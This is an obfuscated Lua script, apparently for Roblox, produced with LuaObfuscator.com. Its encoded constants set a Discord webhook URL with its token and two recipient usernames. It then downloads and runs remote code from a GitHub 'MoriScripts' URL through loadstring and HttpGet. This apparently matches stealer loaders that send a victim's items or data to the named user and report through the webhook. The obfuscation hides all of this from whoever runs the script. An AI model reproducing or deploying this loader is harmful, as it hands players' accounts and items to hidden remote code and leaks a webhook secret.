--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=v2(v0(v30,16));if v19 then local v88=v5(v81,v19);v19=nil;return v88;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==(0 + 0)) then v83=(v31/((5 -(1 + 2))^(v32-(1 -0))))%((2 + 0)^(((v33-(1 -0)) -(v32-1)) + (2 -1))) ;return v83-(v83%(620 -(555 + 64))) ;end end else local v84=(933 -((1814 -(892 + 65)) + 74))^(v32-(118 -((75 -43) + 85))) ;return (((v31%(v84 + v84))>=v84) and (569 -(367 + 201))) or (927 -(214 + (1317 -604))) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;return (v36 * 256) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 1 ;return (v40 * 16777216) + (v39 * 65536) + (v38 * (628 -372)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,3 -(444 -(416 + 26)) ,972 -(802 + 150) ) * ((5 -3)^((181 -124) -25))) + v41 ;local v45=v20(v42,16 + 5 ,1028 -(915 + 82) );local v46=((v20(v42,90 -58 )==(1 + 0)) and  -(1 -(0 + 0))) or 1 ;if (v45==0) then if (v44==(1187 -(1069 + 118))) then return v46 * (0 -0) ;else v45=1 -0 ;v43=0 + (0 -0) ;end elseif (v45==(3636 -1589)) then return ((v44==(0 + 0)) and (v46 * ((792 -(368 + 423))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/((20 -(10 + 8))^(199 -147)))) ;end local function v25(v47)local v48=438 -((514 -369) + 293) ;local v49;local v50;while true do if (v48==(433 -(44 + 386))) then return v6(v50);end if (v48==(1486 -(998 + 488))) then v49=nil;if  not v47 then v47=v23();if (v47==(0 + 0)) then return "";end end v48=860 -(814 + 45) ;end if (v48==(2 + 0)) then v50={};for v89=773 -((495 -294) + 571) , #v49 do v50[v89]=v2(v1(v3(v49,v89,v89)));end v48=1141 -(116 + 56 + 966) ;end if (v48==(4 -3)) then v49=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;v48=7 -5 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if ((1 + 0)==v51) then v54=nil;v55=nil;v51=1132 -(369 + 761) ;end if (v51==(3 + 1)) then while true do if (v52==0) then local v95=0;local v96;while true do if (v95==(0 -0)) then v96=29 -(22 + 7) ;while true do if (v96~=(0 + 0)) then else v53=238 -(64 + 174) ;v54=nil;v96=1 + 0 ;end if (v96~=(1986 -(1266 + 719))) then else v52=604 -(268 + 335) ;break;end end break;end end end if (v52~=(2 -0)) then else local v97=290 -(60 + 230) ;while true do if ((573 -(426 + 146))~=v97) then else v52=1 + 2 ;break;end if (v97==(1456 -(282 + 1174))) then v57=nil;v58=nil;v97=1;end end end if (v52~=(3 + 0)) then else v59=nil;while true do local v99=0;local v100;local v101;while true do if (v99~=(1 + 0)) then else while true do if (v100~=0) then else v101=811 -(569 + 242) ;while true do if (v101==(0 -0)) then local v149=0 + 0 ;while true do if ((1025 -(706 + 318))==v149) then v101=1;break;end if ((1251 -(721 + 530))==v149) then if (v53==(1272 -(945 + 326))) then local v157=1975 -(1913 + 62) ;local v158;while true do if (v157~=(0 -0)) then else v158=0;while true do if (v158==(0 + 0)) then local v161=700 -(271 + 429) ;local v162;while true do if ((0 + 0)~=v161) then else v162=1500 -(1408 + 92) ;while true do if (v162~=1) then else v158=1;break;end if (v162==(0 -0)) then local v178=1086 -(461 + 625) ;while true do if (1==v178) then v162=1289 -(993 + 295) ;break;end if (v178==0) then v57={v54,v55,nil,v56};v58=v23();v178=1 + 0 ;end end end end break;end end end if (v158~=(1 + 0)) then else v59={};v53=1 + 1 ;break;end end break;end end end if (v53~=(858 -(564 + 292))) then else local v159=0 + 0 ;local v160;while true do if (v159==(0 + 0)) then v160=0 -0 ;while true do if (v160==(305 -(244 + 60))) then for v165=1,v23() do local v166=529 -(406 + 123) ;local v167;local v168;local v169;local v170;while true do if (v166==(478 -(41 + 435))) then while true do if (v167==(1769 -(1749 + 20))) then local v179=0 + 0 ;while true do if ((1322 -(1249 + 73))~=v179) then else v168=0 + 0 ;v169=nil;v179=1;end if ((1146 -(466 + 679))~=v179) then else v167=2 -1 ;break;end end end if (v167==(2 -1)) then v170=nil;while true do if ((1901 -(106 + 1794))==v168) then while true do if (v169==(1613 -(1565 + 48))) then v170=v21();if (v20(v170,1 + 0 ,1)~=(0 + 0)) then else local v182=0;local v183;local v184;local v185;while true do if (v182==(1140 -(782 + 356))) then local v186=0 + 0 ;local v187;while true do if (v186==(0 -0)) then v187=267 -(176 + 91) ;while true do if (v187~=(2 -1)) then else v182=3;break;end if (v187==(114 -(4 + 110))) then local v195=584 -(57 + 527) ;while true do if (v195~=(1875 -(157 + 1718))) then else if (v20(v184,1,1428 -(41 + 1386) )~=1) then else v185[2 + 0 ]=v59[v185[6 -4 ]];end if (v20(v184,6 -4 ,105 -(17 + 86) )==(1 + 0)) then v185[6 -3 ]=v59[v185[8 -5 ]];end v195=167 -(122 + 44) ;end if (v195==(2 -1)) then v187=1 -0 ;break;end end end end break;end end end if (v182==0) then local v188=0 -0 ;while true do if (v188~=(0 + 0)) then else v183=v20(v170,1 + 1 ,5 -2 );v184=v20(v170,4,15 -9 );v188=1;end if (v188==(1228 -(322 + 905))) then v182=1;break;end end end if (v182==(66 -(30 + 35))) then local v189=0;while true do if (v189~=(1 + 0)) then else v182=1259 -(1043 + 214) ;break;end if (v189~=(0 -0)) then else v185={v22(),v22(),nil,nil};if (v183==(580 -(361 + 219))) then local v193=320 -(53 + 267) ;local v194;while true do if ((0 -0)==v193) then v194=0;while true do if (v194~=(0 + 0)) then else v185[3]=v22();v185[4]=v22();break;end end break;end end elseif (v183==(1 -0)) then v185[8 -5 ]=v23();elseif (v183==(1 + 1)) then v185[416 -(15 + 398) ]=v23() -((3 -1)^(998 -(18 + 964))) ;elseif (v183~=(11 -8)) then else local v204=0;local v205;local v206;local v207;while true do if (v204==(0 + 0)) then v205=0 + 0 ;v206=nil;v204=851 -(20 + 830) ;end if (v204==(1 + 0)) then v207=nil;while true do if (v205==(126 -(116 + 10))) then local v208=0 + 0 ;while true do if (v208~=(738 -(542 + 196))) then else v206=683 -(483 + 200) ;v207=nil;v208=1;end if (v208~=1) then else v205=1464 -(1404 + 59) ;break;end end end if (v205==(1 -0)) then while true do if (v206==(0 -0)) then v207=0;while true do if (v207==(0 -0)) then v185[3]=v23() -((1 + 1)^(9 + 7)) ;v185[4]=v22();break;end end break;end end break;end end break;end end end v189=1;end end end if ((565 -(334 + 228))==v182) then if (v20(v184,10 -7 ,3)~=(2 -1)) then else v185[2 + 2 ]=v59[v185[4]];end v54[v165]=v185;break;end end end break;end end break;end if (v168==(0 + 0)) then local v181=236 -(141 + 95) ;while true do if ((2 -1)==v181) then v168=2 -1 ;break;end if (v181==(1551 -(1126 + 425))) then v169=0;v170=nil;v181=406 -(118 + 287) ;end end end end break;end end break;end if (v166==(0 -0)) then v167=0;v168=nil;v166=2 -1 ;end if ((1122 -(118 + 1003))==v166) then v169=nil;v170=nil;v166=2;end end end v53=2 + 1 ;break;end if (0==v160) then for v171=1,v58 do local v172=0 -0 ;local v173;local v174;local v175;while true do if (v172==(2 -1)) then v175=nil;while true do if (v173~=0) then else v174=v21();v175=nil;v173=1 + 0 ;end if (v173==(378 -(142 + 235))) then if (v174==1) then v175=v21()~=0 ;elseif (v174==(1 + 1)) then v175=v24();elseif (v174~=3) then else v175=v25();end v59[v171]=v175;break;end end break;end if (v172==(0 -0)) then v173=0;v174=nil;v172=1 + 0 ;end end end v57[4 -1 ]=v21();v160=978 -(553 + 424) ;end end break;end end end v149=1 -0 ;end end end if (v101~=1) then else if (v53==(0 + 0)) then local v152=0;local v153;while true do if (0==v152) then v153=0 + 0 ;while true do if (v153==(2 -1)) then v56={};v53=1 + 0 ;break;end if ((0 + 0)~=v153) then else v54={};v55={};v153=850 -(254 + 595) ;end end break;end end end if (v53~=(2 + 1)) then else local v154=0;local v155;local v156;while true do if (v154~=(0 + 0)) then else v155=0;v156=nil;v154=1;end if (v154==(2 -1)) then while true do if ((1790 -(573 + 1217))~=v155) then else v156=0;while true do if (v156~=(0 -0)) then else local v164=0;while true do if (v164~=(0 -0)) then else for v176=1,v23() do v55[v176-(1 -0) ]=v28();end return v57;end end end end break;end end break;end end end break;end end break;end end break;end if (v99~=0) then else v100=0 + 0 ;v101=nil;v99=4 -3 ;end end end break;end if (v52==(754 -(239 + 514))) then local v98=0 + 0 ;while true do if (1==v98) then v52=1331 -(797 + 532) ;break;end if ((0 + 0)==v98) then v55=nil;v56=nil;v98=1;end end end end break;end if (v51==(1 + 1)) then v56=nil;v57=nil;v51=1 + 2 ;end if (v51~=(6 -3)) then else v58=nil;v59=nil;v51=1206 -(373 + 829) ;end if ((806 -(118 + 688))~=v51) then else v52=731 -(476 + 255) ;v53=nil;v51=1;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=10) then if (v79<=4) then if (v79<=1) then if (v79==0) then local v102=v78[2];v76[v102]=v76[v102](v13(v76,v102 + 1 ,v71));else local v104=v78[2];local v105=v76[v78[3]];v76[v104 + 1 ]=v105;v76[v104]=v105[v78[4]];end elseif (v79<=2) then v76[v78[2]]=v78[3]~=0 ;elseif (v79==3) then v76[v78[2]]=v78[3];else v76[v78[2]][v78[3]]=v78[4];end elseif (v79<=7) then if (v79<=5) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79==6) then v76[v78[2]]=v62[v78[3]];else v70=v78[3];end elseif (v79<=8) then do return;end elseif (v79>9) then v76[v78[2]]=v78[3];else local v122=0;local v123;while true do if (v122==0) then v123=v78[2];v76[v123]=v76[v123](v13(v76,v123 + 1 ,v71));break;end end end elseif (v79<=15) then if (v79<=12) then if (v79==11) then v76[v78[2]]();else v76[v78[2]]();end elseif (v79<=13) then do return;end elseif (v79==14) then v76[v78[2]][v78[3]]=v78[4];else local v126=v78[2];local v127,v128=v69(v76[v126](v13(v76,v126 + 1 ,v78[3])));v71=(v128 + v126) -1 ;local v129=0;for v142=v126,v71 do local v143=0;while true do if (v143==0) then v129=v129 + 1 ;v76[v142]=v127[v129];break;end end end end elseif (v79<=18) then if (v79<=16) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79==17) then v70=v78[3];else local v132=v78[2];local v133=v76[v78[3]];v76[v132 + 1 ]=v133;v76[v132]=v133[v78[4]];end elseif (v79<=19) then v76[v78[2]]=v62[v78[3]];elseif (v79>20) then v76[v78[2]]=v78[3]~=0 ;else local v138=v78[2];local v139,v140=v69(v76[v138](v13(v76,v138 + 1 ,v78[3])));v71=(v140 + v138) -1 ;local v141=0;for v144=v138,v71 do v141=v141 + 1 ;v76[v144]=v139[v141];end end v70=v70 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313037353339313937313832362O3335372O342F735953646E4842777936765A6F4E6467636A61684C665F4737466A5441317034546B2D65634461356C6D5435453669595578487750495F2O634C57464D4E494134696E69030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503083O006372756369616E7403093O00557365724E616D653200173O00120A3O00013O0026053O000E000100020004113O000E0001001206000100033O00300E000100040005001206000100063O001206000200073O00201200020002000800120A000400094O0015000500014O0014000200056O00013O00022O000B0001000100010004113O001600010026053O0001000100010004113O00010001001206000100033O00300E0001000A000B001206000100033O00300E0001000C000B00120A3O00023O0004113O000100012O00083O00017O00",v9(),...);end
